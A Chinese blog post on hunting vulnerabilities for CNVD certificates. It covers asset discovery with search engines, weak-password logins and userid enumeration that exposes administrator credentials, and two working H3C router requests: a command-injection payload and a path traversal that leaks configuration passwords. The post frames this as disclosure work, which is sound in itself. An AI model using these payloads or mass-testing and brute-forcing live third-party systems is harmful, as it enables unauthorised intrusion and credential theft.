前言
一直都想写一篇关于挖掘cnvd通用漏洞证书的文章,但是因为各种原因就拖到了现在,小编是因为工作需要,今年过完年才接触的去挖掘cnvd原创漏洞证书,刚开始不知道挖证书的方式和思路,所以走了很多弯路,现在小编把自己这两个月挖掘证书的思路写下来分享给大家,希望能帮到大家。
条件
对于中危及中危以上通用型漏洞(CVSS2.0基准评分超过4.0分)(除小厂商的产品、非重要APP、黑盒测试案例不满10起等不颁发证书)。
涉及电信行业单位(中国移动、中国联通、中国电信及中国铁塔公司)和中央部委级别(不含直属事业单位)的高危事件型漏洞,CNVD将给予原创漏洞证明(即CNVD漏洞证书,电子版),该证明可通过编号在CNVD官方网站进行查询跟踪。(在漏洞归档后的下周三或周四对符合条件的漏洞颁发证书)
搜索引擎推荐:
1:fofa https://fofa.info/
2:鹰图平台 https://hunter.qianxin.com/
3:360网络空间绘测 https://quake.360.cn/
4:shodan https://www.shodan.io/
我个人比较常用fofa和鹰图平台配合查找资产
挖掘方式:
方式一:
使用爱企查结合FOFA、奇安信、鹰图、钟馗之眼等多个资产测绘平台进行资产收集。
然后进行筛选
收集完之后,选择其中一个公司点击知识产权
然后在搜索引擎里面进行资产搜索,例如fofa,常用body、title等语法进行匹配搜索,搜索到之后你就可以按照你平常测试的思路进行测试了。
方式二:打野战(这种方法个人认为有点运气成分)
使用搜索引擎的搜索语法,例如fofa:title="系统"、title="门禁"、title="设备"、"管理平台"、"管理系统"、"登录平台"、"登录系统"等等,我个人比较喜欢去搜一些有登陆框的系统进行测试
进行常规测试
测试到漏洞之后去爱企查、天眼查等公司看注册资本是否符合条件,符合的话再根据指纹特征去搜索更多的资产,写案例
为什么说小编觉得这个方式有点运气成分呢,因为是盲测,你不知道该系统的公司注册资本是不是满足通用漏洞的条件,以及如果满足的情况下你也不知道案例是否满足10个,所以小编觉得有点运气成分在里面。
方式三:老洞新挖
这个方法是有点投机取巧的,个人认为也是获得证书最简单的方式,抛开其他不谈如果你只是想获得证书的话
1)web
首先在cnvd平台看最近出的弱口令的漏洞
映入眼帘的是亚控的一个开发系统,直接拿去鹰图搜索
访问页面开始测试,把我的大宝贝字典拿出来跑一下
发现弱口令是admin001/admin001
登入开始测试,越权呀、sql呀等等,首先测试越权发现登录普通用户账号之后使用burp抓包,重放,遍历userid参数可以看到超级管理员和系统管理员的账号密码,id=69为当前user普通用户的id,id=1为超级管理员用户用于管理系统管理员,id=2为系统管理员用户用于管理普通用户。
这就测到越权漏洞啦,再去查询有没有人交过这个漏洞,如果没有咱就可以交了试试。
其次,在扩展一波搜索kingportal,就找到了一个开发中心的页面
那这个系统会不会也有弱口令呢
这不巧了吗,这不是,然后又可以登进去测一波其他的洞了(禁止套娃)
注意:好像cnvd现在不收web端的通用弱口令了,设备和网关的还收
2)设备
谈到设备,小编第一时间想到的就是路由器之类的洞,说到路由器第一时间想到了华三的路由器
之前在看csdn的文章的时候看到过华三路由器出的洞
漏洞1:
H3C多系列路由器存在前台RCE漏洞
Referer: http://{{Hostname}}/userLogin.asp
访问http://xxx/test
POST /goform/aspForm HTTP/1.1
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
CMD=DelL2tpLNSList&GO=vpn_l2tp_session.asp¶m=1; $(ls>/www/test);
响应代码:302
漏洞2:
H3C多系列路由器存在敏感信息泄露漏洞
GET /userLogin.asp/../actionpolicy_status/../{设备型号}.cfg HTTP/1.1
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
响应代码:200
响应特征:vtyname vtypasswd
这样就可以去搜索华三的路由器型号,然后依次去验证是否有漏洞然后提交,这种也算是捡漏获取证书了。
方法四:白盒测试 网站源码下载 https://down.chinaz.com/
直接到网上下载使用量大的网站源码,再去fofa搜索查看有多少案例是用该源码搭建的,符号证书条件的源码在自己搭建环境分析源码,进行代码审计挖掘漏洞。
Ps:其实挖掘app出的证书是最快最多的,首先去爱企查收集资产
然后根据app去公司官网下载,在app登录口一般都有用户名枚举,然后根据用户名进行暴力破解,就很轻易就能测到!
以下是小编这段时间挖到的证书:
推荐站内搜索:最好用的开发软件、免费开源系统、渗透测试工具云盘下载、最新渗透测试资料、最新黑客工具下载……
还没有评论,来说两句吧...